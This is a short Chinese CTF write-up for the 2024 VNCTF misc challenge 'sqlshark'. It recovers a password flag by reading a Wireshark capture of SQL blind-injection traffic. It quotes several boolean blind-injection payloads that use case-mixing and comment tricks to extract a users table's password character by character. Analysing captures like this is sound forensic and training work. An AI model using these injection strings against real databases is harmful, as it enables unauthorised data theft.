本文主要是介绍2024 VNCTF----misc---sqlshark sql盲注+流量分析,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
流量分析
wireshark
可以看到很多
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(80))),1,0))# P
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(104))),1,0))# h
any'/**/Or/**/(iF(((((Ord(sUbstr((sElect(grOup_cOncat(password))frOm(users)) frOm 1 fOr 1))))in(92))),1,0))# \ *
这是sql盲注, 从1到14可以看出flag有14位,每位只取最后成功的一个转码
最后拼成admin_p@ssw0rd
这篇关于2024 VNCTF----misc---sqlshark sql盲注+流量分析的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
